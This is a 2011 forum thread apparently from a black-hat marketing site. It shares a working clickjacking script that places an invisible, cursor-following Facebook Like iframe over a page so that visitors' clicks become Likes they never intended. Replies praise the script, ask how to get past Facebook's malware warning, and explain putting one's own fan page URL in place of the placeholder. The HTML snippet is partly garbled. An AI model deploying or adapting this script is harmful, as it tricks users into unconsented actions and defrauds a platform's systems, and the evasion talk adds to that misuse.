43.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

04-07-2011, 09:54 PM
Post: #1
[GET] Basic Forced Like / Clickjacking script [Public Edition]
Script below creates a iframe like box that follows your cursor. The iframe is invisible and requires the user to click somewhere.

Paste these codes into 2 separate files (one html, one js)

index.html

PHP Code:
<script language="javascript">  window.onload = function(){ var document.createElement('script'); s.src 'jscript.js'document.getElementsByTagName('body')[0].appendChild(s); }   </script> <bodyClick anywhere </body

jscript.js
Code:
(function(){

  var Xcord = 0,
  Ycord = 0,
  IE = document.all ? true : false;
  
  if (!IE) document.captureEvents(Event.MOUSEMOVE);
  
  var lbox = document.createElement('iframe');
  lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'http://porn.com/') + '&amp;layout=standard&amp;show_faces=true&amp;width=53&amp;action=lbox&amp;colorscheme=light&amp;height=80';
  lbox.scrolling = 'no';
  lbox.frameBorder = 0;
  lbox.allowTransparency = 'true';
  lbox.style.border = 0;
  lbox.style.overflow = 'hidden';
  lbox.style.cursor = 'pointer';
  lbox.style.width = '53px';
  lbox.style.height =  '23px';
  lbox.style.position = 'absolute';
  lbox.style.opacity = 0;
  document.getElementsByTagName('body')[0].appendChild(lbox);
  
  window.addEventListener('mousemove', mouseMove, false);
  
  setTimeout(function(){
    document.getElementsByTagName('body')[0].removeChild(lbox);
    window.removeEventListener('mousemove', mouseMove, false);
  }, 10000);
  
  function mouseMove(e) {
    if (IE) {
      Xcord = event.clientX + document.body.scrollLeft;
      Ycord = event.clientY + document.body.scrollTop;
    } else {
      Xcord = e.pageX;
      Ycord = e.pageY;
    }
    
    if (Xcord < 0) Xcord = 0;
    if (Ycord < 0) Ycord = 0;
    
    lbox.style.top = (Ycord - 8) + 'px';
    lbox.style.left = (Xcord - 25) + 'px';
    
    return true
  }
})();
>>> Making impossible things possible!!! Cool <<<
Heart Heart Heart I love BBHF and MVP so much. Heart Heart Heart
-TheDonator-
04-15-2011, 12:39 AM
Post: #2
RE: [FREE] Basic Forced Like / Clickjacking script [Public Edition]
thanks bro! will try this..
05-27-2011, 01:09 AM (This post was last modified: 05-27-2011 01:11 AM by cpachamp1.)
Post: #3
RE: [GET] Basic Forced Like / Clickjacking script [Public Edition]
Its Working.. But When we share it on our wall.. and click link.. facebook malware popup :@
Is There Any way to Hide Malware?
07-02-2011, 03:11 AM
Post: #4
RE: [GET] Basic Forced Like / Clickjacking script [Public Edition]
what a script!!
08-04-2011, 08:17 PM
Post: #5
RE: [GET] Basic Forced Like / Clickjacking script [Public Edition]
d*** this is nice stuff works beautiful!!! THXX
41.gif
08-04-2011, 10:30 PM
Post: #6
RE: [GET] Basic Forced Like / Clickjacking script [Public Edition]
Anyone find out if there was a way to hide the malwarE?
08-05-2011, 08:28 PM
Post: #7
RE: [GET] Basic Forced Like / Clickjacking script [Public Edition]
I would like to try this out only if somehow could get rid of the malware. Thanks anyway Wink
08-05-2011, 08:48 PM
Post: #8
RE: [GET] Basic Forced Like / Clickjacking script [Public Edition]
Please explain where do we upload these two files to.

I see http://porn.com in the javascript.
08-06-2011, 12:19 AM
Post: #9
RE: [GET] Basic Forced Like / Clickjacking script [Public Edition]
(08-05-2011 08:48 PM)bigspanner Wrote:  Please explain where do we upload these two files to.

I see in the javascript.

The porn dot com should be replaced with your facebook fan page url. Better way should be to upload it to your website and let the user click. if facebook is opened it is give you a like.

That is what i feel.
08-15-2011, 04:39 AM
Post: #10
RE: [GET] Basic Forced Like / Clickjacking script [Public Edition]
It's still working ???
7.gif




75.gif